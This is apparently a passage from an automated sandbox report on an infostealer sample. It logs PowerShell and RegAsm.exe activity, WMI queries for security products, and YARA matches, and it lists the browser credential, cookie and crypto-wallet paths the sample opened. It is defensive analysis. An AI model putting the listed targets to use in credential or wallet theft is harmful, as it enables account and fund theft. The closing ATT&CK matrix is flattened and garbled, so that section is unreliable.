                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0513~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Windows.StartLayout.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.Windows.StartLayout.Commands.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Whea\Microsoft.Windows.Whea.WheaMemoryPolicy.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\WindowsSearch\Microsoft.WindowsSearch.Commands.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.WindowsSearch.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsSearch.Commands.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                  Source: C:\Users\user\Desktop\sRMytgfRpJ.exeCode function: 0_2_00007FF7D6FD8964 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,GetTickCount,QueryPerformanceCounter,0_2_00007FF7D6FD8964
                  Source: C:\Users\user\Desktop\sRMytgfRpJ.exeCode function: 0_2_00007FF7D6FD2C54 GetVersion,GetModuleHandleW,GetProcAddress,ExitWindowsEx,CloseHandle,0_2_00007FF7D6FD2C54
                  Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct

                  Stealing of Sensitive Information

Source: Yara match | File source: dump.pcap, type: PCAP
Source: Yara match | File source: 10.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000A.00000002.2070112434.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: RegAsm.exe PID: 8044, type: MEMORYSTR
Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: ElectrumE#
Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: JaxxE#
Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: ExodusE#
Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: EthereumE#
Source: powershell.exe, 00000004.00000002.2402928898.00007FFD9BA80000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: sqlcolumnencryptionkeystoreprovider
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Roaming\atomic\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Roaming\Binance\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\Cache\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\db\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Roaming\Exodus\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Roaming\Guarda\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\
Source: Yara match | File source: 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: RegAsm.exe PID: 8044, type: MEMORYSTR

                  Remote Access Functionality

Source: Yara match | File source: dump.pcap, type: PCAP
Source: Yara match | File source: 10.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000A.00000002.2070112434.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: RegAsm.exe PID: 8044, type: MEMORYSTR

MITRE ATT&CK Matrix (columns): Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                  Gather Victim Identity Information111
                  Scripting
                  Valid Accounts221
                  Windows Management Instrumentation
                  111
                  Scripting
                  1
                  DLL Side-Loading
                  1
                  Disable or Modify Tools
                  1
                  OS Credential Dumping
                  1
                  System Time Discovery
                  Remote Services11
                  Archive Collected Data
                  1
                  Ingress Tool Transfer
                  Exfiltration Over Other Network Medium1
                  System Shutdown/Reboot
                  CredentialsDomainsDefault Accounts12
                  Native API
                  1
                  DLL Side-Loading
                  1
                  Access Token Manipulation
                  1
                  Deobfuscate/Decode Files or Information
                  LSASS Memory2
                  File and Directory Discovery
                  Remote Desktop Protocol3
                  Data from Local System
                  21
                  Encrypted Channel
                  Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain Accounts1
                  Exploitation for Client Execution
                  1
                  Registry Run Keys / Startup Folder
                  211
                  Process Injection
                  1
                  Obfuscated Files or Information
                  Security Account Manager117
                  System Information Discovery
                  SMB/Windows Admin SharesData from Network Shared Drive1
                  Non-Standard Port
                  Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal Accounts2
                  Command and Scripting Interpreter
                  Login Hook1
                  Registry Run Keys / Startup Folder
                  1
                  Install Root Certificate
                  NTDS221
                  Security Software Discovery
                  Distributed Component Object ModelInput Capture2
                  Non-Application Layer Protocol
                  Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud Accounts2
                  PowerShell
                  Network Logon ScriptNetwork Logon Script1
                  Software Packing
                  LSA Secrets1
                  Process Discovery
                  SSHKeylogging13
                  Application Layer Protocol
                  Scheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                  Timestomp
                  Cached Domain Credentials241
                  Virtualization/Sandbox Evasion
                  VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                  DLL Side-Loading
                  DCSync1
                  Application Window Discovery
                  Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                  Masquerading
                  Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                  Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt241
                  Virtualization/Sandbox Evasion
